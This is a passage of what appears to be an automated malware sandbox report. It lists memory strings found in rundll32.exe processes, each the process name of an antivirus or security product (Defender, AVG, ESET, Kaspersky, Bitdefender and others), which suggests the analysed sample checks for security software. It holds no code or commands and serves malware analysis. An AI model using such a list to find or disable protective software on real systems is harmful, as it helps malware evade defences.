    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163928030.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521925258.0000025BF009A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCANMSG.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387089360.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: apvxdwin.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012065404.0000025BF012E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387123364.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239614242.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862490782.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PAVFNSVR.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089047921.0000025BF00E8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: f-stopw.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935104556.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsav.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387123364.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935242512.0000025BF0145000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: mcupdate.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414881638.0000025BEE292000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089047921.0000025BF00E8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: fp-win.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DRWEBSCD.EXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A2GUARD.EXE
    Source: rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563006653.0000025BF00D6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562791270.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: kpfw32.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qoeloader.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVKTray.exe
    Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FAMEH32.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVGTRAY.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: spidernt.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EMLPROUI.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: spideragent.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164057570.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cafw.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nod32.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012083156.0000025BEE2EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371707051.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kav.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: savservice.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387089360.0000025BF0173000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VRMONSVC.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ACAEGMgr.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DefWatch.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: bdagent.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935242512.0000025BF0145000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371707051.0000025BEE244000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pctsAuxs.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EMLPROXY.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ITMRTSVC.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: K7TSMngr.exe
